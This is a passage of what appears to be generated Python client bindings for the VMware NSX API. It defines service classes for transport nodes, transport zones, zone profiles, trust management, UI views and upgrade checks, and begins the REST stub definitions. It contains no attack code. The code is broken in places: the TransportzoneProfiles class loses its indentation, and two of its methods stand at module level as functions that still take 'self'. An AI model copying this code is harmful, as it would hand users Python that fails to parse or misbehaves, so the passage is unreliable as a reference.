        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('resynchostconfig',
                            {
                            'transportnode_id': transportnode_id,
                            })
    def update(self,
               transport_node_id,
               transport_node,
               esx_mgmt_if_migration_dest=None,
               if_id=None,
               ping_ip=None,
               vnic=None,
               vnic_migration_dest=None,
               ):
        """
        Modifies the transport node information. The host_switch_name field
        must match the host_switch_name value specified in the transport zone
        (API: transport-zones). You must create the associated uplink profile
        (API: host-switch-profiles) before you can specify an uplink_name here.
        If the host is an ESX and has only one physical NIC being used by a
        vSphere standard switch, TransportNodeUpdateParameters should be used
        to migrate the management interface and the physical NIC into a logical
        switch that is in a transport zone this transport node will join or has
        already joined. If the migration is already done,
        TransportNodeUpdateParameters can also be used to migrate the
        management interface and the physical NIC back to a vSphere standard
        switch. In other cases, the TransportNodeUpdateParameters should NOT be
        used. When updating transport node you should follow pattern where you
        should fetch the existing transport node and then only modify the
        required properties keeping other properties as is. For API backward
        compatibility, property host_switches will be still returned in
        response and will contain the configuration matching the one in
        host_switch_spec. In update call you should only modify configuration
        in either host_switch_spec or host_switches, but not both. Property
        host_switch_spec should be preferred over deprecated host_switches
        property when creating or updating transport nodes. It also modifies
        attributes of node (host or edge).
        :type  transport_node_id: :class:`str`
        :param transport_node_id: (required)
        :type  transport_node: :class:`com.vmware.nsx.model_client.TransportNode`
        :param transport_node: (required)
        :type  esx_mgmt_if_migration_dest: :class:`str` or ``None``
        :param esx_mgmt_if_migration_dest: The network ids to which the ESX vmk interfaces will be migrated
            (optional)
        :type  if_id: :class:`str` or ``None``
        :param if_id: The ESX vmk interfaces to migrate (optional)
        :type  ping_ip: :class:`str` or ``None``
        :param ping_ip: IP Addresses to ping right after ESX vmk interfaces were migrated.
            (optional)
        :type  vnic: :class:`str` or ``None``
        :param vnic: The ESX vmk interfaces and/or VM NIC to migrate (optional)
        :type  vnic_migration_dest: :class:`str` or ``None``
        :param vnic_migration_dest: The migration destinations of ESX vmk interfaces and/or VM NIC
            (optional)
        :rtype: :class:`com.vmware.nsx.model_client.TransportNode`
        :return: com.vmware.nsx.model.TransportNode
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('update',
                            {
                            'transport_node_id': transport_node_id,
                            'transport_node': transport_node,
                            'esx_mgmt_if_migration_dest': esx_mgmt_if_migration_dest,
                            'if_id': if_id,
                            'ping_ip': ping_ip,
                            'vnic': vnic,
                            'vnic_migration_dest': vnic_migration_dest,
                            })
    def updatemaintenancemode(self,
                              transportnode_id,
                              action=None,
                              ):
        """
        Put transport node into maintenance mode or exit from maintenance mode.
        :type  transportnode_id: :class:`str`
        :param transportnode_id: (required)
        :type  action: :class:`str` or ``None``
        :param action: (optional) One of the ``UPDATEMAINTENANCEMODE_ACTION_*``
            constants defined on this class.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('updatemaintenancemode',
                            {
                            'transportnode_id': transportnode_id,
                            'action': action,
                            })
class TransportZones(VapiInterface):
    """
    Client-side stub for the ``com.vmware.nsx.transport_zones`` service.
    Each public method delegates the call, with its named parameters, to
    the generated ``_TransportZonesStub`` via :func:`VapiInterface._invoke`.
    """
    # Allowed values for the ``transport_type`` filter of ``list``.
    LIST_TRANSPORT_TYPE_OVERLAY = "OVERLAY"
    """
    Possible value for ``transportType`` of method :func:`TransportZones.list`.
    """
    LIST_TRANSPORT_TYPE_VLAN = "VLAN"
    """
    Possible value for ``transportType`` of method :func:`TransportZones.list`.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.transport_zones'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _TransportZonesStub)
        # No operation-specific identifiers are registered for this service.
        self._VAPI_OPERATION_IDS = {}
    def create(self,
               transport_zone,
               ):
        """
        Creates a new transport zone. The required parameters are
        host_switch_name and transport_type (OVERLAY or VLAN). The optional
        parameters are description and display_name.
        :type  transport_zone: :class:`com.vmware.nsx.model_client.TransportZone`
        :param transport_zone: (required)
        :rtype: :class:`com.vmware.nsx.model_client.TransportZone`
        :return: com.vmware.nsx.model.TransportZone
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('create',
                            {
                            'transport_zone': transport_zone,
                            })
    def delete(self,
               zone_id,
               ):
        """
        Deletes an existing transport zone.
        :type  zone_id: :class:`str`
        :param zone_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('delete',
                            {
                            'zone_id': zone_id,
                            })
    def get(self,
            zone_id,
            ):
        """
        Returns information about a single transport zone.
        :type  zone_id: :class:`str`
        :param zone_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.TransportZone`
        :return: com.vmware.nsx.model.TransportZone
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('get',
                            {
                            'zone_id': zone_id,
                            })
    def list(self,
             cursor=None,
             included_fields=None,
             is_default=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             transport_type=None,
             uplink_teaming_policy_name=None,
             ):
        """
        Returns information about configured transport zones. NSX requires at
        least one transport zone. NSX uses transport zones to provide
        connectivity based on the topology of the underlying network, trust
        zones, or organizational separations. For example, you might have
        hypervisors that use one network for management traffic and a different
        network for VM traffic. This architecture would require two transport
        zones. The combination of transport zones plus transport connectors
        enables NSX to form tunnels between hypervisors. Transport zones define
        which interfaces on the hypervisors can communicate with which other
        interfaces on other hypervisors to establish overlay tunnels or provide
        connectivity to a VLAN. A logical switch can be in one (and only one)
        transport zone. This means that all of a switch's interfaces must be in
        the same transport zone. However, each hypervisor virtual switch (OVS
        or VDS) has multiple interfaces (connectors), and each connector can be
        attached to a different logical switch. For example, on a single
        hypervisor with two connectors, connector A can be attached to logical
        switch 1 in transport zone A, while connector B is attached to logical
        switch 2 in transport zone B. In this way, a single hypervisor can
        participate in multiple transport zones. The API for creating a
        transport zone requires that a single host switch be specified for each
        transport zone, and multiple transport zones can share the same host
        switch.
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of records (supplied
            by current result page) (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be included in query
            result (optional)
        :type  is_default: :class:`bool` or ``None``
        :param is_default: Filter to choose if default transport zones will be returned
            (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page (server may return
            fewer) (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :type  transport_type: :class:`str` or ``None``
        :param transport_type: Filter to choose the type of transport zones to return (optional)
            One of the ``LIST_TRANSPORT_TYPE_*`` constants defined on this
            class.
        :type  uplink_teaming_policy_name: :class:`str` or ``None``
        :param uplink_teaming_policy_name: The transport zone's uplink teaming policy name (optional)
        :rtype: :class:`com.vmware.nsx.model_client.TransportZoneListResult`
        :return: com.vmware.nsx.model.TransportZoneListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('list',
                            {
                            'cursor': cursor,
                            'included_fields': included_fields,
                            'is_default': is_default,
                            'page_size': page_size,
                            'sort_ascending': sort_ascending,
                            'sort_by': sort_by,
                            'transport_type': transport_type,
                            'uplink_teaming_policy_name': uplink_teaming_policy_name,
                            })
    def update(self,
               zone_id,
               transport_zone,
               ):
        """
        Updates an existing transport zone. Modifiable parameters are
        transport_type (VLAN or OVERLAY), description, and display_name. The
        request must include the existing host_switch_name.
        :type  zone_id: :class:`str`
        :param zone_id: (required)
        :type  transport_zone: :class:`com.vmware.nsx.model_client.TransportZone`
        :param transport_zone: (required)
        :rtype: :class:`com.vmware.nsx.model_client.TransportZone`
        :return: com.vmware.nsx.model.TransportZone
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('update',
                            {
                            'zone_id': zone_id,
                            'transport_zone': transport_zone,
                            })
class TransportzoneProfiles(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.transportzone_profiles'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _TransportzoneProfilesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
transport_zone_profile,
):
"""
Creates a transport zone profile. The resource_type is required.
:type transport_zone_profile: :class:`vmware.vapi.struct.VapiStruct`
:param transport_zone_profile: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.TransportZoneProfile`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.TransportZoneProfile
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.TransportZoneProfile`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'transport_zone_profile': transport_zone_profile,
})
def delete(self,
transportzone_profile_id,
):
"""
Deletes a specified transport zone profile.
:type transportzone_profile_id: :class:`str`
:param transportzone_profile_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'transportzone_profile_id': transportzone_profile_id,
})
def get(self,
transportzone_profile_id,
):
"""
Returns information about a specified transport zone profile.
:type transportzone_profile_id: :class:`str`
:param transportzone_profile_id: (required)
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.TransportZoneProfile
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.TransportZoneProfile`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'transportzone_profile_id': transportzone_profile_id,
})
def list(self,
         cursor=None,
         include_system_owned=None,
         included_fields=None,
         page_size=None,
         resource_type=None,
         sort_ascending=None,
         sort_by=None,
         ):
    """
    Return information about the configured transport zone profiles.
    Transport zone profiles define networking policies for transport zones
    and transport zone endpoints.

    :type  cursor: :class:`str` or ``None``
    :param cursor: Opaque cursor to be used for getting next page of records
        (supplied by current result page) (optional)
    :type  include_system_owned: :class:`bool` or ``None``
    :param include_system_owned: Whether the list result contains system
        resources (optional, default to false)
    :type  included_fields: :class:`str` or ``None``
    :param included_fields: Comma separated list of fields that should be
        included in query result (optional)
    :type  page_size: :class:`long` or ``None``
    :param page_size: Maximum number of results to return in this page
        (server may return fewer) (optional, default to 1000)
    :type  resource_type: :class:`str` or ``None``
    :param resource_type: comma-separated list of transport zone profile
        types, e.g. ?resource_type=BfdHealthMonitoringProfile (optional)
    :type  sort_ascending: :class:`bool` or ``None``
    :param sort_ascending: (optional)
    :type  sort_by: :class:`str` or ``None``
    :param sort_by: Field by which records are sorted (optional)
    :rtype: :class:`com.vmware.nsx.model_client.TransportZoneProfileListResult`
    :return: com.vmware.nsx.model.TransportZoneProfileListResult
    :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
        Service Unavailable
    :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
        Bad Request, Precondition Failed
    :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
        Internal Server Error
    :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
        Forbidden
    :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
        Not Found
    """
    # All parameters are optional query filters; None entries are handled
    # by the binding layer (optional struct fields).
    call_args = {
        'cursor': cursor,
        'include_system_owned': include_system_owned,
        'included_fields': included_fields,
        'page_size': page_size,
        'resource_type': resource_type,
        'sort_ascending': sort_ascending,
        'sort_by': sort_by,
    }
    return self._invoke('list', call_args)
def update(self,
           transportzone_profile_id,
           transport_zone_profile,
           ):
    """
    Modify the transport zone profile identified by
    ``transportzone_profile_id``. The body of the PUT request must include
    the resource_type.

    :type  transportzone_profile_id: :class:`str`
    :param transportzone_profile_id: (required)
    :type  transport_zone_profile: :class:`vmware.vapi.struct.VapiStruct`
    :param transport_zone_profile: (required)
        The parameter must contain all the attributes defined in
        :class:`com.vmware.nsx.model_client.TransportZoneProfile`.
    :rtype: :class:`vmware.vapi.struct.VapiStruct`
    :return: com.vmware.nsx.model.TransportZoneProfile
        The return value will contain all the attributes defined in
        :class:`com.vmware.nsx.model_client.TransportZoneProfile`.
    :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
        Service Unavailable
    :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
        Bad Request, Precondition Failed
    :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
        Internal Server Error
    :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
        Forbidden
    :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
        Not Found
    """
    # The id routes the request; the profile struct becomes the PUT body.
    call_args = {
        'transportzone_profile_id': transportzone_profile_id,
        'transport_zone_profile': transport_zone_profile,
    }
    return self._invoke('update', call_args)
class TrustManagement(VapiInterface):
    """
    Client bindings for the NSX trust-management service, which reports the
    certificate algorithms and key sizes the manager supports.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.trust_management'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _TrustManagementStub)
        self._VAPI_OPERATION_IDS = {}

    def get(self):
        """
        Returns information about the supported algorithms and key sizes.

        :rtype: :class:`com.vmware.nsx.model_client.TrustManagementData`
        :return: com.vmware.nsx.model.TrustManagementData
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        # No input struct for this operation, hence None for the args.
        return self._invoke('get', None)
class UiViews(VapiInterface):
    """
    Client bindings for the NSX UI views service, which manages dashboard
    View resources (create, read, update, delete).
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.ui_views'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _UiViewsStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, view):
        """
        Creates a new View.

        :type  view: :class:`com.vmware.nsx.model_client.View`
        :param view: (required)
        :rtype: :class:`com.vmware.nsx.model_client.View`
        :return: com.vmware.nsx.model.View
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('create', {'view': view})

    def delete(self, view_id):
        """
        Delete the View identified by ``view_id``.

        :type  view_id: :class:`str`
        :param view_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('delete', {'view_id': view_id})

    def get(self, tag=None, view_ids=None, widget_id=None):
        """
        If no query params are specified then all the views entitled for the
        user are returned. The views to which a user is entitled to include
        the views created by the user and the shared views.

        :type  tag: :class:`str` or ``None``
        :param tag: The tag for which associated views to be queried.
            (optional)
        :type  view_ids: :class:`str` or ``None``
        :param view_ids: Ids of the Views (optional)
        :type  widget_id: :class:`str` or ``None``
        :param widget_id: Id of widget configuration (optional)
        :rtype: :class:`com.vmware.nsx.model_client.ViewList`
        :return: com.vmware.nsx.model.ViewList
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'tag': tag,
            'view_ids': view_ids,
            'widget_id': widget_id,
        }
        return self._invoke('get', call_args)

    def get_0(self, view_id):
        """
        Returns Information about a specific View.

        :type  view_id: :class:`str`
        :param view_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.View`
        :return: com.vmware.nsx.model.View
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        # 'get_0' is the generator's disambiguation of a second GET overload.
        return self._invoke('get_0', {'view_id': view_id})

    def update(self, view_id, view):
        """
        Update the View identified by ``view_id``.

        :type  view_id: :class:`str`
        :param view_id: (required)
        :type  view: :class:`com.vmware.nsx.model_client.View`
        :param view: (required)
        :rtype: :class:`com.vmware.nsx.model_client.View`
        :return: com.vmware.nsx.model.View
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'view_id': view_id,
            'view': view,
        }
        return self._invoke('update', call_args)
class Upgrade(VapiInterface):
    """
    Client bindings for the NSX upgrade service: pre/post-upgrade checks and
    upgrade-coordinator self-upgrade.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.upgrade'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _UpgradeStub)
        self._VAPI_OPERATION_IDS = {}

    def abortpreupgradechecks(self):
        """
        Aborts execution of pre-upgrade checks if already in progress. Halts
        the execution of checks awaiting execution at this point and makes
        best-effort attempts to stop checks already in execution. Returns
        without action if execution of pre-upgrade checks is not in progress.

        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        # Operation takes no input struct.
        return self._invoke('abortpreupgradechecks', None)

    def executepostupgradechecks(self, component_type):
        """
        Run pre-defined checks to identify issues after upgrade of a
        component. The results of the checks are added to the respective
        upgrade units aggregate-info. The progress and status of
        post-upgrade checks is part of aggregate-info of individual upgrade
        unit groups. Returns HTTP status 500 with error code 30953 if
        execution of post-upgrade checks is already in progress.

        :type  component_type: :class:`str`
        :param component_type: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('executepostupgradechecks',
                            {'component_type': component_type})

    def executepreupgradechecks(self,
                                component_type=None,
                                cursor=None,
                                included_fields=None,
                                page_size=None,
                                sort_ascending=None,
                                sort_by=None,
                                ):
        """
        Run pre-defined checks to identify potential issues which can be
        encountered during an upgrade or can cause an upgrade to fail. The
        results of the checks are added to the respective upgrade units
        aggregate-info. The progress and status of operation is part of
        upgrade status summary of individual components. Returns HTTP status
        500 with error code 30953 if execution of pre-upgrade checks is
        already in progress.

        :type  component_type: :class:`str` or ``None``
        :param component_type: Component type on which the action is
            performed or on which the results are filtered (optional)
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of
            records (supplied by current result page) (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should
            be included in query result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page
            (server may return fewer) (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'component_type': component_type,
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('executepreupgradechecks', call_args)

    def upgradeuc(self):
        """
        Upgrade the upgrade coordinator module itself. This call is invoked
        after user uploads an upgrade bundle. Once this call is invoked,
        upgrade coordinator stops and gets restarted and target version
        upgrade coordinator module comes up after restart.

        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        # Operation takes no input struct.
        return self._invoke('upgradeuc', None)
class _AssociationsStub(ApiInterfaceStub):
    """
    Generated REST stub backing the ``Associations`` service
    (``com.vmware.nsx.associations``). Declares the wire-level metadata
    (input struct types, error mappings and REST routing) that
    :class:`ApiInterfaceStub` uses to dispatch the ``list`` operation.
    """
    def __init__(self, config):
        # properties for list operation
        # Three required filter params plus standard optional paging/sorting.
        list_input_type = type.StructType('operation-input', {
            'associated_resource_type': type.StringType(),
            'resource_id': type.StringType(),
            'resource_type': type.StringType(),
            'cursor': type.OptionalType(type.StringType()),
            'fetch_ancestors': type.OptionalType(type.BooleanType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        # Maps canonical vAPI error ids to binding error types.
        list_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        list_input_value_validator_list = [
        ]
        list_output_validator_list = [
        ]
        # All inputs are sent as query parameters; no path variables.
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/associations',
            path_variables={
            },
            query_parameters={
                'associated_resource_type': 'associated_resource_type',
                'resource_id': 'resource_id',
                'resource_type': 'resource_type',
                'cursor': 'cursor',
                'fetch_ancestors': 'fetch_ancestors',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json'
        )
        operations = {
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'AssociationListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'list': list_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.associations',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _BatchStub(ApiInterfaceStub):
    """
    Generated REST stub backing the ``Batch`` service
    (``com.vmware.nsx.batch``). Declares the wire-level metadata for the
    single ``create`` operation (POST of a BatchRequest).
    """
    def __init__(self, config):
        # properties for create operation
        # 'batch_request' is the request body; 'atomic' is an optional flag.
        create_input_type = type.StructType('operation-input', {
